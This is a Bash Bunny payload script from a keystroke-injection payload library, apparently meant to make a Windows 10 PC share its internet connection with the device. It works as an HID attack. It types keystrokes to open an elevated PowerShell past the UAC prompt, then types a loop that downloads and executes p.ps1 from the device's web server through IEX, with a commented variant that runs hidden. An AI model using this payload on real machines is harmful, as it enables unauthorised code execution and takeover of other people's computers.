bashbunny-payloads/payloads/library/general/Windows NIC Sharing/payload.txt

#!/bin/bash
##############################################
# Sharing Internet with Windows
#
# Auto-config sharing with Windows 10.
##############################################

# Other things to do once you have booted the
# bash bunny as an ethernet enabled box
#
# Windows
# Start > Run > "ncpa.cpl" Enter
# (Open Network Connections)
#Q DELAY 100
#RUN WIN ncpa.cpl
#Q DELAY 1000
#Q ENTER

# Identify Bash Bunny interface
# Should be named:
# "USB Ethernet/RNDIS Gadget"

# Sharing is caring
# Right-Click Ineternet interface click on
# "Properties" and select "Sharing" tab
# 
# From "Sharing" tab check
# "Allow other netwrk usrs 2 connect... thru dis connection"
# Select the Bash Bunny Gadget and hit "OK"
# Right-click on Gadget and select "Properties"
#
# Generously gift an IP
# Select TCP/IPv4 and click "Properties"
# Set the IPv4=172.16.64.64 and Subnet=24-bit
# Hit all the OKs

# Or we could just have the Bash Bunny do all the work...
LED SETUP
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION

# HID Attack Starts
ATTACKMODE HID

# UAC Bypass
LED STAGE2
DELAY 500
Q GUI r
Q DELAY 1000
Q STRING powershell Start-Process powershell -Verb runAs
Q DELAY 1000
Q ENTER
Q DELAY 1000
Q ALT y
Q DELAY 500
Q ALT o
Q DELAY 500
Q LEFTARROW
Q DELAY 100
Q ENTER
Q DELAY 1200
Q ENTER
Q DELAY 800

LED SPECIAL2
#Powershell Payload: first wait for connection to bunny webserver, then run network config
#Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\""
Q STRING "Start-Sleep -Seconds 15 ; while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1')}}"
Q DELAY 300
Q ENTER

LED W
# Ethernet Attack Starts
ATTACKMODE RNDIS_ETHERNET
LED CLEANUP
Q DELAY 200
LED B
python $SWITCHDIR/server.py

Q DELAY 5000
LED FINISH